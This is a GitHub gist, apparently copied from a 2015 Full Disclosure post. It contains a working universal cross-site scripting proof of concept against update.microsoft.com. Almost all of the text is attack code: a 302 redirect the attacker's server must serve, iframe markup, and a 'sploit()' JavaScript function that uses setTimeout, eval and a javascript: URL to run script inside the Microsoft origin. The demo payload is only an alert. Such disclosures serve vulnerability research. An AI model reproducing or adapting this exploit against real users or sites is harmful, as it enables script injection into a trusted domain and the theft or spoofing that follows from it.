Skip to content

Instantly share code, notes, and snippets.

/gist:f0b1481f0ae5424454f3 Secret
Created Feb 3, 2015

Embed
What would you like to do?
// From http://seclists.org/fulldisclosure/2015/Feb/0
// Sample: UXSS against https://update.microsoft.com
// Make the URI /1 on your server respond with the HTTP redirect:
< HTTP/1.1 302 Found
< Content-Type: text/html;charset=utf-8
< Location: https://update.microsoft.com/asdadasd
// XSS into https://update.microsoft.com
<iframe id=i name=i src="/1"></iframe><br>
<iframe src="https://update.microsoft.com/asdadasd" onload='sploit()'></iframe><br>
<script>
function sploit(){
var payload = 'alert(location.href);'
frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
}
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.